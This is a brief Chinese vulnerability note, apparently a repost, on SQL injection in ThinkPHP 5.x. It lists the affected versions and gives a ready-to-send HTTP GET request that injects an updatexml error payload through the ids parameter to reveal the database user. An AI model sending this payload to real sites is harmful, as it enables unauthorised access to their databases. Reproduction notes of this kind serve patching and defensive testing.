登录 白背景
源码

thinkphp 5.x版本存在SQL注入漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 5.x版本存在SQL注入漏洞</font>

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

  • ThinkPHP 5.x

三、资产测绘

  • 特征

1729964067714-6a67d2ff-29b3-41ad-95e6-3d2ab586db35.png

四、漏洞复现

GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1
Host: 
User-Agent: Java/1.8.0_291
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

1729966327485-90a1da38-c105-4fb0-9ca2-f1f2493ae9f9.png

原文: https://www.yuque.com/xiaokp7/ocvun2/qem7qvhvsxk5ddgo